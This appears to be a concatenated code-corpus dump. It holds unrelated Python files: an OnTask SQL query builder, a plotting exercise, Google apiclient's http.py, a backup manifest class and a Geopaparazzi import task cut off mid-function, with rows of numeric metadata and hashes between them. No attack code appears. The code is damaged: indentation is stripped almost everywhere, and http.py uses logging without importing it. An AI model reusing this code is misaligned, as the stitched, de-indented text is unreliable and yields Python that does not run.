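#   #   (<formula SQL>) AND ("email" = %s)
#   # and fields holds the corresponding literal values.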
def get_select_query(
table_name: str,
column_names: Optional[List[str]] = None,
filter_formula: Optional[Dict] = None,
filter_pairs: Optional[Mapping] = None,
) -> Tuple[sql.Composed, List[Any]]:
"""Calculate pair query, fields to execute a select statement.
:param table_name: Table to query
:param column_names: list of columns to consider or None to consider all
:param filter_formula: Text filter expression
:param filter_pairs: Dictionary of key/value pairs.
:return: (sql query, sql params)
"""
if column_names:
query = sql.SQL('SELECT {0} FROM {1}').format(
sql.SQL(', ').join([
OnTaskDBIdentifier(cname) for cname in column_names
]),
sql.Identifier(table_name),
)
else:
query = sql.SQL('SELECT * FROM {0}').format(sql.Identifier(table_name))
query_fields = []
if filter_formula or filter_pairs:
bool_clause, query_fields = get_boolean_clause(
filter_formula=filter_formula,
filter_pairs=filter_pairs,
)
if bool_clause:
query = query + sql.SQL(' WHERE ') + bool_clause
return query, query_fields
def get_select_query_txt(
table_name: str,
column_names: Optional[List[str]] = None,
filter_formula: Optional[Dict] = None,
filter_pairs: Optional[Mapping] = None,
) -> Tuple[str, List[Any]]:
"""Calculate the text representation of a query to select table subset.
:param table_name: Table to query
:param column_names: list of columns to consider or None to consider all
:param filter_formula: Text filter expression
:param filter_pairs: Dictionary of key/value pairs.
:return: (sql query, sql params)
"""
# invoke get_select_query and transform into string
query_str, fields = get_select_query(
table_name,
column_names=column_names,
filter_formula=filter_formula,
filter_pairs=filter_pairs,
)
return query_str.as_string(connection.connection), fields
def search_table(
table_name: str,
search_value: str,
columns_to_search: Optional[List] = None,
filter_formula: Optional[Dict] = None,
any_join: bool = True,
order_col_name: str = None,
order_asc: bool = True,
):
"""Search the content of all cells in the table.
    Select rows where, for every (column, value) pair, the column contains the
    value (as in LIKE %value%). The pairs are combined with OR if any_join is
    True, or with AND otherwise, and the result is ordered by the given column
    and direction (if given).
:param table_name: table name
    :param filter_formula: Optional filter condition to pre-filter the query
    :param columns_to_search: List of column names to search the value in; the
     query is built with these terms as requirements AND the filter condition.
:param any_join: Boolean encoding if values should be combined with OR (or
AND)
:param order_col_name: Order results by this column
:param order_asc: Order results in ascending values (or descending)
:param search_value: String to search
:return: The resulting query set
"""
# Create the query
if columns_to_search:
query = sql.SQL('SELECT {0} FROM {1}').format(
sql.SQL(', ').join([
OnTaskDBIdentifier(colname) for colname in columns_to_search
]),
sql.Identifier(table_name),
)
else:
        query = sql.SQL('SELECT * FROM {0}').format(sql.Identifier(table_name))
query_fields = []
where_clause = sql.SQL('')
# Add filter part if present
if filter_formula:
filter_query, filter_fields = evaluate_formula(
filter_formula,
EVAL_SQL)
if filter_query:
where_clause = filter_query
query_fields += filter_fields
# Add the CAST {0} AS TEXT LIKE ...
if search_value:
if where_clause != sql.SQL(''):
where_clause = where_clause + sql.SQL(' AND ')
# Combine the search subqueries
if any_join:
conn_txt = ' OR '
else:
conn_txt = ' AND '
where_clause = where_clause + sql.SQL(conn_txt).join([
sql.SQL('(CAST ({0} AS TEXT) LIKE %s)').format(
OnTaskDBIdentifier(cname),
) for cname in columns_to_search
])
query_fields += ['%' + search_value + '%'] * len(columns_to_search)
if where_clause != sql.SQL(''):
query = query + sql.SQL(' WHERE ') + where_clause
# Add the order if needed
if order_col_name:
query = query + sql.SQL(' ORDER BY {0}').format(
OnTaskDBIdentifier(order_col_name))
if not order_asc:
query = query + sql.SQL(' DESC')
# Execute the query
with connection.connection.cursor() as cursor:
cursor.execute(query, query_fields)
search_result = cursor.fetchall()
return search_result
def delete_table(table_name: str):
"""Delete the given table.
:param table_name: Table to delete
:return: Drop the table in the DB
"""
query = sql.SQL('DROP TABLE IF EXISTS {0}').format(sql.Identifier(table_name))
try:
with connection.connection.cursor() as cursor:
cursor.execute(query)
except Exception as exc:
logger.error('Error when dropping table %s: %s', table_name, str(exc))
# --- plottask.py | Osheah/PFORCS-problem-sheet | Apache-2.0 ---
# program that displays a plot of the functions f(x) = x, g(x) = x**2, h(x) = x**3 and makes the plot look fancy
# helen oshea
# 20210311
# import the modules
import numpy as np # needed for creating the x axis
import matplotlib.pyplot as plt # needed for ploting
x = np.arange(0,4, .1) # create the x axis
fx= x # the line y = x
gx = x**2 # the curve y = x squared
hx = x**3 # the curve y = x cubed
plt.title('plot of x, x**2, x**3') # the title of the plot
plt.xlabel('x') # the x axis label
plt.ylabel('y') # the y axis label
plt.plot(x, fx, label='x') # the line
plt.plot(x, gx, label='x**2') # the quadratic curve
plt.plot(x, hx, label='x**3') # the cubic curve
plt.legend() # show the labels
plt.savefig('plottask.jpg')
plt.show() # show the plot
# --- lib/apiclient/http.py | alecdotico/engineauth | Apache-2.0 ---
# Copyright (C) 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classes to encapsulate a single HTTP request.
The classes implement a command pattern, with every
object supporting an execute() method that does the
actual HTTP request.
"""
__author__ = 'jcgregorio@google.com (Joe Gregorio)'
__all__ = [
    'HttpRequest', 'RequestMockBuilder', 'HttpMock',
    'set_user_agent', 'tunnel_patch',
]
import copy
import httplib2
import os
import mimeparse
import mimetypes
from model import JsonModel
from errors import HttpError
from errors import ResumableUploadError
from errors import UnexpectedBodyError
from errors import UnexpectedMethodError
from anyjson import simplejson
class MediaUploadProgress(object):
"""Status of a resumable upload."""
def __init__(self, resumable_progress, total_size):
"""Constructor.
Args:
resumable_progress: int, bytes sent so far.
total_size: int, total bytes in complete upload.
"""
self.resumable_progress = resumable_progress
self.total_size = total_size
def progress(self):
"""Percent of upload completed, as a float."""
return float(self.resumable_progress)/float(self.total_size)
class MediaUpload(object):
"""Describes a media object to upload.
Base class that defines the interface of MediaUpload subclasses.
"""
def getbytes(self, begin, end):
raise NotImplementedError()
def size(self):
raise NotImplementedError()
def chunksize(self):
raise NotImplementedError()
def mimetype(self):
return 'application/octet-stream'
def resumable(self):
return False
def _to_json(self, strip=None):
"""Utility function for creating a JSON representation of a MediaUpload.
Args:
strip: array, An array of names of members to not include in the JSON.
Returns:
string, a JSON representation of this instance, suitable to pass to
from_json().
"""
t = type(self)
d = copy.copy(self.__dict__)
if strip is not None:
for member in strip:
del d[member]
d['_class'] = t.__name__
d['_module'] = t.__module__
return simplejson.dumps(d)
def to_json(self):
"""Create a JSON representation of an instance of MediaUpload.
Returns:
string, a JSON representation of this instance, suitable to pass to
from_json().
"""
return self._to_json()
@classmethod
def new_from_json(cls, s):
"""Utility class method to instantiate a MediaUpload subclass from a JSON
representation produced by to_json().
Args:
s: string, JSON from to_json().
Returns:
An instance of the subclass of MediaUpload that was serialized with
to_json().
"""
data = simplejson.loads(s)
# Find and call the right classmethod from_json() to restore the object.
module = data['_module']
m = __import__(module, fromlist=module.split('.')[:-1])
kls = getattr(m, data['_class'])
from_json = getattr(kls, 'from_json')
return from_json(s)
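# Illustrative round trip (not part of the original module):
#
#   upload = MediaFileUpload('smiley.png')    # subclass defined below
#   s = upload.to_json()                      # records _class and _module
#   restored = MediaUpload.new_from_json(s)   # re-imports and rebuilds it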
class MediaFileUpload(MediaUpload):
"""A MediaUpload for a file.
Construct a MediaFileUpload and pass as the media_body parameter of the
method. For example, if we had a service that allowed uploading images:
media = MediaFileUpload('smiley.png', mimetype='image/png', chunksize=1000,
resumable=True)
service.objects().insert(
bucket=buckets['items'][0]['id'],
name='smiley.png',
media_body=media).execute()
"""
def __init__(self, filename, mimetype=None, chunksize=10000, resumable=False):
"""Constructor.
Args:
filename: string, Name of the file.
mimetype: string, Mime-type of the file. If None then a mime-type will be
guessed from the file extension.
chunksize: int, File will be uploaded in chunks of this many bytes. Only
used if resumable=True.
resumable: bool, True if this is a resumable upload. False means upload in
a single request.
"""
self._filename = filename
self._size = os.path.getsize(filename)
self._fd = None
if mimetype is None:
(mimetype, encoding) = mimetypes.guess_type(filename)
self._mimetype = mimetype
self._chunksize = chunksize
self._resumable = resumable
def mimetype(self):
return self._mimetype
def size(self):
return self._size
def chunksize(self):
return self._chunksize
def resumable(self):
return self._resumable
def getbytes(self, begin, length):
"""Get bytes from the media.
Args:
begin: int, offset from beginning of file.
length: int, number of bytes to read, starting at begin.
Returns:
A string of bytes read. May be shorter than length if EOF was reached
first.
"""
if self._fd is None:
self._fd = open(self._filename, 'rb')
self._fd.seek(begin)
return self._fd.read(length)
def to_json(self):
"""Create a JSON representation of an instance of MediaFileUpload.
Returns:
string, a JSON representation of this instance, suitable to pass to
from_json().
"""
return self._to_json(['_fd'])
@staticmethod
def from_json(s):
d = simplejson.loads(s)
return MediaFileUpload(
d['_filename'], d['_mimetype'], d['_chunksize'], d['_resumable'])
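# A minimal round-trip sketch (illustrative, not part of the library's tests;
# assumes 'smiley.png' exists locally and this module is importable under the
# name recorded in the JSON):
#   media = MediaFileUpload('smiley.png', mimetype='image/png')
#   restored = MediaUpload.new_from_json(media.to_json())
#   assert restored.mimetype() == 'image/png'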
class HttpRequest(object):
"""Encapsulates a single HTTP request.
"""
def __init__(self, http, postproc, uri,
method='GET',
body=None,
headers=None,
methodId=None,
resumable=None):
"""Constructor for an HttpRequest.
Args:
http: httplib2.Http, the transport object to use to make a request
postproc: callable, called on the HTTP response and content to transform
it into a data object before returning, or raising an exception
on an error.
uri: string, the absolute URI to send the request to
method: string, the HTTP method to use
body: string, the request body of the HTTP request.
headers: dict, the HTTP request headers
methodId: string, a unique identifier for the API method being called.
resumable: MediaUpload, None if this is not a resumable request.
"""
self.uri = uri
self.method = method
self.body = body
self.headers = headers or {}
self.methodId = methodId
self.http = http
self.postproc = postproc
self.resumable = resumable
major, minor, params = mimeparse.parse_mime_type(
headers.get('content-type', 'application/json'))
self.multipart_boundary = params.get('boundary', '').strip('"')
# If this was a multipart resumable, the size of the non-media part.
self.multipart_size = 0
# The resumable URI to send chunks to.
self.resumable_uri = None
# The bytes that have been uploaded.
self.resumable_progress = 0
if resumable is not None:
if self.body is not None:
self.multipart_size = len(self.body)
else:
self.multipart_size = 0
self.total_size = self.resumable.size() + self.multipart_size + len(self.multipart_boundary)
def execute(self, http=None):
"""Execute the request.
Args:
http: httplib2.Http, an http object to be used in place of the
one the HttpRequest request object was constructed with.
Returns:
A deserialized object model of the response body as determined
by the postproc.
Raises:
apiclient.errors.HttpError if the response was not a 2xx.
httplib2.Error if a transport error has occurred.
"""
if http is None:
http = self.http
if self.resumable:
body = None
while body is None:
_, body = self.next_chunk(http)
return body
else:
resp, content = http.request(self.uri, self.method,
body=self.body,
headers=self.headers)
if resp.status >= 300:
raise HttpError(resp, content, self.uri)
return self.postproc(resp, content)
def next_chunk(self, http=None):
"""Execute the next step of a resumable upload.
Can only be used if the method being executed supports media uploads and the
MediaUpload object passed in was flagged as using resumable upload.
Example:
media = MediaFileUpload('smiley.png', mimetype='image/png', chunksize=1000,
resumable=True)
request = service.objects().insert(
bucket=buckets['items'][0]['id'],
name='smiley.png',
media_body=media)
response = None
while response is None:
status, response = request.next_chunk()
if status:
print "Upload %d%% complete." % int(status.progress() * 100)
Returns:
(status, body): (ResumableMediaStatus, object)
The body will be None until the resumable media is fully uploaded.
"""
if http is None:
http = self.http
if self.resumable_uri is None:
start_headers = copy.copy(self.headers)
start_headers['X-Upload-Content-Type'] = self.resumable.mimetype()
start_headers['X-Upload-Content-Length'] = str(self.resumable.size())
start_headers['Content-Length'] = '0'
resp, content = http.request(self.uri, self.method,
body="",
headers=start_headers)
if resp.status == 200 and 'location' in resp:
self.resumable_uri = resp['location']
else:
raise ResumableUploadError("Failed to retrieve starting URI.")
if self.body:
begin = 0
data = self.body
else:
begin = self.resumable_progress - self.multipart_size
data = self.resumable.getbytes(begin, self.resumable.chunksize())
# Tack on the multipart/related boundary if we are at the end of the file.
if begin + self.resumable.chunksize() >= self.resumable.size():
data += self.multipart_boundary
headers = {
'Content-Range': 'bytes %d-%d/%d' % (
self.resumable_progress, self.resumable_progress + len(data) - 1,
self.total_size),
}
resp, content = http.request(self.resumable_uri, 'PUT',
body=data,
headers=headers)
if resp.status in [200, 201]:
return None, self.postproc(resp, content)
# A "308 Resume Incomplete" indicates we are not done.
elif resp.status == 308:
self.resumable_progress = int(resp['range'].split('-')[1]) + 1
if self.resumable_progress >= self.multipart_size:
self.body = None
if 'location' in resp:
self.resumable_uri = resp['location']
else:
raise HttpError(resp, content, self.uri)
return MediaUploadProgress(self.resumable_progress, self.total_size), None
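# Worked example of the Content-Range arithmetic above (illustrative values):
# with chunksize=1000 and resumable_progress=2000, the chunk request carries
#   Content-Range: bytes 2000-2999/<total_size>
# and a "308 Resume Incomplete" reply of 'range: bytes=0-2999' advances
# resumable_progress to 3000 for the next call.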
def to_json(self):
"""Returns a JSON representation of the HttpRequest."""
d = copy.copy(self.__dict__)
if d['resumable'] is not None:
d['resumable'] = self.resumable.to_json()
del d['http']
del d['postproc']
return simplejson.dumps(d)
@staticmethod
def from_json(s, http, postproc):
"""Returns an HttpRequest populated with info from a JSON object."""
d = simplejson.loads(s)
if d['resumable'] is not None:
d['resumable'] = MediaUpload.new_from_json(d['resumable'])
return HttpRequest(
http,
postproc,
uri = d['uri'],
method= d['method'],
body=d['body'],
headers=d['headers'],
methodId=d['methodId'],
resumable=d['resumable'])
class HttpRequestMock(object):
"""Mock of HttpRequest.
Do not construct directly, instead use RequestMockBuilder.
"""
def __init__(self, resp, content, postproc):
"""Constructor for HttpRequestMock
Args:
resp: httplib2.Response, the response to emulate coming from the request
content: string, the response body
postproc: callable, the post processing function usually supplied by
the model class. See model.JsonModel.response() as an example.
"""
self.resp = resp
self.content = content
self.postproc = postproc
if resp is None:
self.resp = httplib2.Response({'status': 200, 'reason': 'OK'})
if 'reason' in self.resp:
self.resp.reason = self.resp['reason']
def execute(self, http=None):
"""Execute the request.
Same behavior as HttpRequest.execute(), but the response is
mocked and not really from an HTTP request/response.
"""
return self.postproc(self.resp, self.content)
class RequestMockBuilder(object):
"""A simple mock of HttpRequest
Pass in a dictionary to the constructor that maps request methodIds to
tuples of (httplib2.Response, content, opt_expected_body) that should be
returned when that method is called. None may also be passed in for the
httplib2.Response, in which case a 200 OK response will be generated.
If an opt_expected_body (str or dict) is provided, it will be compared to
the body and UnexpectedBodyError will be raised on inequality.
Example:
response = '{"data": {"id": "tag:google.c...'
requestBuilder = RequestMockBuilder(
{
'plus.activities.get': (None, response),
}
)
apiclient.discovery.build("plus", "v1", requestBuilder=requestBuilder)
Methods that you do not supply a response for will return a
200 OK with an empty string as the response content or raise an exception if
check_unexpected is set to True. The methodId is taken from the rpcName
in the discovery document.
For more details see the project wiki.
"""
def __init__(self, responses, check_unexpected=False):
"""Constructor for RequestMockBuilder
The constructed object should be a callable object
that can replace the class HttpRequest.
responses - A dictionary that maps methodIds into tuples
of (httplib2.Response, content). The methodId
comes from the 'rpcName' field in the discovery
document.
check_unexpected - A boolean setting whether or not UnexpectedMethodError
should be raised on unsupplied method.
"""
self.responses = responses
self.check_unexpected = check_unexpected
def __call__(self, http, postproc, uri, method='GET', body=None,
headers=None, methodId=None, resumable=None):
"""Implements the callable interface that discovery.build() expects
of requestBuilder, which is to build an object compatible with
HttpRequest.execute(). See that method for the description of the
parameters and the expected response.
"""
if methodId in self.responses:
response = self.responses[methodId]
resp, content = response[:2]
if len(response) > 2:
# Test the body against the supplied expected_body.
expected_body = response[2]
if bool(expected_body) != bool(body):
# Not expecting a body and provided one
# or expecting a body and not provided one.
raise UnexpectedBodyError(expected_body, body)
if isinstance(expected_body, str):
expected_body = simplejson.loads(expected_body)
body = simplejson.loads(body)
if body != expected_body:
raise UnexpectedBodyError(expected_body, body)
return HttpRequestMock(resp, content, postproc)
elif self.check_unexpected:
raise UnexpectedMethodError(methodId)
else:
model = JsonModel(False)
return HttpRequestMock(None, '{}', model.response)
class HttpMock(object):
"""Mock of httplib2.Http"""
def __init__(self, filename, headers=None):
"""
Args:
filename: string, absolute filename to read response from
headers: dict, header to return with response
"""
if headers is None:
headers = {'status': '200 OK'}
f = file(filename, 'r')
self.data = f.read()
f.close()
self.headers = headers
def request(self, uri,
method='GET',
body=None,
headers=None,
redirections=1,
connection_type=None):
return httplib2.Response(self.headers), self.data
class HttpMockSequence(object):
"""Mock of httplib2.Http
Mocks a sequence of calls to request returning different responses for each
call. Create an instance initialized with the desired response headers
and content and then use as if an httplib2.Http instance.
http = HttpMockSequence([
({'status': '401'}, ''),
({'status': '200'}, '{"access_token":"1/3w","expires_in":3600}'),
({'status': '200'}, 'echo_request_headers'),
])
resp, content = http.request("http://examples.com")
There are special values you can pass in for content to trigger
behaviours that are helpful in testing.
'echo_request_headers' means return the request headers in the response body
'echo_request_headers_as_json' means return the request headers as a JSON
string in the response body
'echo_request_body' means return the request body in the response body
'echo_request_uri' means return the request uri in the response body
"""
def __init__(self, iterable):
"""
Args:
iterable: iterable, a sequence of pairs of (headers, body)
"""
self._iterable = iterable
def request(self, uri,
method='GET',
body=None,
headers=None,
redirections=1,
connection_type=None):
resp, content = self._iterable.pop(0)
if content == 'echo_request_headers':
content = headers
elif content == 'echo_request_headers_as_json':
content = simplejson.dumps(headers)
elif content == 'echo_request_body':
content = body
elif content == 'echo_request_uri':
content = uri
return httplib2.Response(resp), content
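# A minimal test-style sketch of the echo behaviour (illustrative usage):
#   http = HttpMockSequence([({'status': '200'}, 'echo_request_body')])
#   resp, content = http.request('http://example.org', 'POST', body='abc')
#   assert content == 'abc'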
def set_user_agent(http, user_agent):
"""Set the user-agent on every request.
Args:
http - An instance of httplib2.Http
or something that acts like it.
user_agent: string, the value for the user-agent header.
Returns:
A modified instance of http that was passed in.
Example:
h = httplib2.Http()
h = set_user_agent(h, "my-app-name/6.0")
Most of the time the user-agent will be set while doing auth; this is for the
rare cases where you are accessing an unauthenticated endpoint.
"""
request_orig = http.request
# The closure that will replace 'httplib2.Http.request'.
def new_request(uri, method='GET', body=None, headers=None,
redirections=httplib2.DEFAULT_MAX_REDIRECTS,
connection_type=None):
"""Modify the request headers to add the user-agent."""
if headers is None:
headers = {}
if 'user-agent' in headers:
headers['user-agent'] = user_agent + ' ' + headers['user-agent']
else:
headers['user-agent'] = user_agent
resp, content = request_orig(uri, method, body, headers,
redirections, connection_type)
return resp, content
http.request = new_request
return http
def tunnel_patch(http):
"""Tunnel PATCH requests over POST.
Args:
http - An instance of httplib2.Http
or something that acts like it.
Returns:
A modified instance of http that was passed in.
Example:
h = httplib2.Http()
h = tunnel_patch(h)
Useful if you are running on a platform that doesn't support PATCH.
Apply this last if you are using OAuth 1.0, as changing the method
will result in a different signature.
"""
request_orig = http.request
# The closure that will replace 'httplib2.Http.request'.
def new_request(uri, method='GET', body=None, headers=None,
redirections=httplib2.DEFAULT_MAX_REDIRECTS,
connection_type=None):
"""Tunnel the request method: rewrite PATCH into POST with an override header."""
if headers is None:
headers = {}
if method == 'PATCH':
if 'oauth_token' in headers.get('authorization', ''):
logging.warning(
'OAuth 1.0 request made with Credentials after tunnel_patch.')
headers['x-http-method-override'] = "PATCH"
method = 'POST'
resp, content = request_orig(uri, method, body, headers,
redirections, connection_type)
return resp, content
http.request = new_request
return http
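# A minimal sketch (hypothetical test, not part of this module) showing the
# method override in action via HttpMockSequence:
#   http = HttpMockSequence([({'status': '200'}, 'echo_request_headers_as_json')])
#   http = tunnel_patch(http)
#   resp, content = http.request('http://example.org', method='PATCH', body='{}')
#   assert simplejson.loads(content)['x-http-method-override'] == 'PATCH'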
| 32.116923 | 98 | 0.65822 | 2,660 | 20,876 | 5.076692 | 0.185714 | 0.025992 | 0.015551 | 0.010886 | 0.238004 | 0.190684 | 0.17854 | 0.168395 | 0.158027 | 0.151659 | 0 | 0.007538 | 0.250144 | 20,876 | 649 | 99 | 32.16641 | 0.855117 | 0.456553 | 0 | 0.3 | 0 | 0 | 0.075364 | 0.013227 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12069 | false | 0 | 0.041379 | 0.024138 | 0.286207 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b4624156d72b09ac88f02395c6089a4280577f0 | 7,924 | py | Python | src/backuper/manifest.py | EduardoLemos567/PyBackuper | c339ffbb25690597e64bcfce5347d8d6e9dc27f0 | [
"MIT"
] | null | null | null | src/backuper/manifest.py | EduardoLemos567/PyBackuper | c339ffbb25690597e64bcfce5347d8d6e9dc27f0 | [
"MIT"
] | null | null | null | src/backuper/manifest.py | EduardoLemos567/PyBackuper | c339ffbb25690597e64bcfce5347d8d6e9dc27f0 | [
"MIT"
] | null | null | null | """
:license:
license is described in the LICENSE file provided.
A copy can be accessed in: https://github.com/EduardoLemos567/PyBackuper/blob/master/LICENSE
:author:
Eduardo Lemos de Moraes
"""
import collections
from . import foldernode
class Manifest:
"""
Class to keep the folder structure and file paths and signatures.
Also keep the timestamp for future sync compares.
"""
def __init__(self):
self.timestamp = None # float
self.root = foldernode.FolderNode(":root:")
def __eq__(self, other):
"""
:param other Manifest: other manifest to compare to.
:return bool: False if any 'self' manifest's folder or file doesn't exist on 'other' manifest.
Or, in case of files, the signature doesn't match.
"""
if type(other) is not Manifest:
return False
queue = collections.deque([(self.root, other.root)])
while len(queue) > 0:
self_folder, other_folder = queue.popleft()
# if any name is missing or is different
if self_folder._children.keys() ^ other_folder._children.keys():
return False
# we know both side got the same names in keys
for self_node_instance in self_folder._children.values():
other_node_instance = other_folder[self_node_instance.name]
# if both names points to the same type of object
if type(self_node_instance) == type(other_node_instance):
if type(self_node_instance) is foldernode.FolderNode:
# case its a folder, add for the next cycle
queue.append(
(self_node_instance, other_folder[self_node_instance.name])
)
# case its a file, check signature
elif self_node_instance.signature != other_node_instance.signature:
return False
else:
return False
return True
def diff_nodes(self, other, include_files=True, include_folders=True):
"""
:param other Manifest: other manifest to compare nodes of.
:param include_files bool: should return FileNodes
:param include_folders bool: should return FolderNodes
:return generator(Node): (files/folders) existing on 'self' manifest
but without a corresponding copy on 'other' manifest.
"""
if (not include_files) and (not include_folders):
return
# iterate all 'self' folders from 'root'
for folder_node in self.iterate(include_files=False):
# try to find a corresponding folder on 'other'
result = other.find_child(folder_node.get_parts())
if result is None:
# if not found, all 'self' folder's content are unique, include on the results
for value in folder_node.get_children():
if type(value) is foldernode.FolderNode:
if include_folders:
yield value
elif include_files:
yield value
else:
for value in folder_node.diff_nodes(
result, include_files, include_folders
):
yield value
def get_signatures_set(self):
"""
:return set(str): Return a set (each set member is unique, no copies) of all signatures
for all files existing on this manifest.
"""
s = set()
for file_node in self.iterate(include_folders=False):
s.add(file_node.signature)
return s
def get_signatures_dict(self, limit=None):
"""
Method to group all FileNodes under their signatures, making them easy to test and find.
:param limit int|None: You can set a limit to the lists, None = no limit. If you set
limit==1 instead of a list, the values are just single FileNodes (the first one found)
:return dict(key:str, value:list(FileNode)): A dict grouping all files by its signature.
Key are the signature and values is a list of all FileNode with that signature (but in case
of limit==1 we get single FileNodes instead of lists).
"""
d = dict()
for file_node in self.iterate(include_folders=False):
if file_node.signature in d:
if limit is None or len(d[file_node.signature]) < limit:
d[file_node.signature].append(file_node)
else:
if limit is None or limit > 1:
d[file_node.signature] = [file_node]
else:
d[file_node.signature] = file_node
return d
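# A minimal sketch (hypothetical usage): finding duplicated files by signature.
#   dupes = {sig: nodes for sig, nodes in manifest.get_signatures_dict().items()
#            if len(nodes) > 1}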
def iterate(self, include_files=True, include_folders=True):
"""
Do a iteration returning a generator, including all nodes by given parameters.
Can include: only files, only folders or both.
:param include_files bool: should return FileNodes
:param include_folders bool: should return FolderNodes
:return generator(Node): Generator object that yields Nodes doing a deep listing of children.
"""
if (not include_files) and (not include_folders):
return
queue = collections.deque([self.root])
while len(queue) > 0:
folder = queue.popleft()
if include_folders:
yield folder
# NOTE: why do we use get_children() here?
# So we have a frozen set, ignoring outside changes.
for node_instance in folder.get_children():
if type(node_instance) is foldernode.FolderNode:
queue.append(node_instance) # yield on the next cycle
elif include_files:
yield node_instance
def find_child(self, parts, ensure_folder_exists=False):
"""
Find the correct child following the parts sequence,
doing a deep search on the "folder" children nodes.
(Always start looking on the self.root folder)
:param parts sequence: any sequence object to look for parts.
:param ensure_folder_exists bool: If any part of the parts doesn't exist,
we create it and assume the whole path points to folders.
(Meaning you should not use it for file paths)
:return Node: the Node pointing to that path; in case of ensure_folder_exists and
the path doesn't exist, we create it as a path of folders.
Can return None if ensure_folder_exists is False and the path does not exist.
"""
created = False # it's a flag indicating we should stop looking and from now on create folders
folder = self.root
for name in parts:
if not created:
if name in folder:
folder = folder[name]
elif ensure_folder_exists:
created = True
else:
return None
if created:
folder = foldernode.FolderNode(name, folder)
return folder
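# A minimal sketch (hypothetical folder names):
#   node = manifest.find_child(('photos', '2020'), ensure_folder_exists=True)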
def print_debug(self):
"""
Method to print the whole manifest in a human readable way.
"""
print("Manifest:\n")
print(
"Folders:\n{}\n".format(
"\n".join(
[
folder_node.get_path_str()
for folder_node in self.iterate(include_files=False)
]
)
)
)
print(
"Files:\n{}\n".format(
"\n".join(
[
file_node.get_path_str()
for file_node in self.iterate(include_folders=False)
]
)
)
)
| 42.148936 | 102 | 0.576855 | 953 | 7,924 | 4.679958 | 0.228751 | 0.037668 | 0.025112 | 0.019058 | 0.25 | 0.179596 | 0.152691 | 0.134753 | 0.115471 | 0.047982 | 0 | 0.00157 | 0.357143 | 7,924 | 187 | 103 | 42.374332 | 0.873969 | 0.37683 | 0 | 0.256881 | 0 | 0 | 0.010357 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073395 | false | 0 | 0.018349 | 0 | 0.201835 | 0.036697 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b48ca5dfa86aee634ad96662cb5b88fe16fda6e | 6,306 | py | Python | profiles/tasks.py | brentfraser/geotabloid | 772106b2d39b5405045814b5f013ece5713469b1 | [
"MIT"
] | null | null | null | profiles/tasks.py | brentfraser/geotabloid | 772106b2d39b5405045814b5f013ece5713469b1 | [
"MIT"
] | null | null | null | profiles/tasks.py | brentfraser/geotabloid | 772106b2d39b5405045814b5f013ece5713469b1 | [
"MIT"
] | null | null | null | # Create your tasks here
from __future__ import absolute_import, unicode_literals
import os
from datetime import datetime, timezone
# from celery import shared_task
from geotabloid.taskapp.celery import app
import sqlite3
import tempfile
from PIL import Image, ExifTags
from django.contrib.auth import get_user_model
from gp_projects.models import ImageNote, Note, TrackFeature
from django.contrib.gis.geos import Point, LineString
from django.core.files import File
from django.core.files.storage import default_storage
@app.task
def LoadUserProject(userproject_file, ownerid):
"""Given an uploaded Geopaparazzi UserProject,
extract the useful bits and load them to the database
:param userproject_file: name of the sqlite3 file to be read
:param ownerid: id of the file owner
:type userproject_file: string
:type ownerid: int
:rtype: None
Since the userproject file and the images extracted from it may be managed by the Django-storages module (Boto)
we have to take care to make local copies of all files accessed.
Also, since this task is intended for asynchronous execution via Celery, the calling parameters cannot be
model instances (they are not JSON serializable!), so any model references have to be passed using primary keys
"""
# before we can open the database file, it must be copied locally!
document = default_storage.open(userproject_file, 'rb')
userproject = tempfile.NamedTemporaryFile(delete=False)
# this might be a memory problem!
data = document.read()
userproject.write(data)
userproject.close()
# get the owner from the ownerid
User = get_user_model()
owner = User.objects.get(id=ownerid)
# connect to the database
conn = sqlite3.connect(userproject.name)
conn.row_factory = sqlite3.Row
c = conn.cursor()
# import gpstracks if any
for gpslog in c.execute('SELECT * FROM gpslogs;'):
log_dict = dict(gpslog)
rcd = TrackFeature(owner=owner, text=log_dict['text'])
rcd.timestamp_start = datetime.utcfromtimestamp(log_dict['startts']/1000).replace(tzinfo=timezone.utc)
rcd.timestamp_end = datetime.utcfromtimestamp(log_dict['endts']/1000).replace(tzinfo=timezone.utc)
rcd.lengthm = log_dict['lengthm']
d = conn.cursor()
plist = []
for pt in d.execute('SELECT * FROM gpslogsdata WHERE logid=? ORDER BY ts ASC', (log_dict['_id'],)):
pt_dict = dict(pt)
plist.append(Point(pt_dict['lon'], pt_dict['lat']))
rcd.linestring = LineString(plist)
rcd.save()
d.close()
# import notes and images together in order to preserve relationships
for nt in c.execute('SELECT * FROM notes;'):
nt_dict = dict(nt)
rcd = Note(owner=owner, text= nt_dict['text'], form = nt_dict['form'])
rcd.timestamp = datetime.utcfromtimestamp(nt_dict['ts']/1000).replace(tzinfo=timezone.utc)
rcd.description = nt_dict['description']
rcd.lat = nt_dict['lat']
rcd.lon = nt_dict['lon']
rcd.location = Point(rcd.lon, rcd.lat)
rcd.altitude = nt_dict['altim']
rcd.save() # save the Note here so that we can refer to it when creating ImageNote records
d = conn.cursor()
# Import all Images linked to the current Note
# Design Note: presumes ImageNote records are _always_ referenced by a Note
# unreferenced records will not be imported
for im in d.execute('SELECT * FROM images WHERE note_id=?;', (nt_dict['_id'],)):
im_dict = dict(im)
imgrcd = ImageNote(owner=owner, note=rcd, azimuth=im_dict['azim'])
# Note that ImageNote records have time and location distinct from the Note
imgrcd.timestamp = datetime.utcfromtimestamp(im_dict['ts']/1000).replace(tzinfo=timezone.utc)
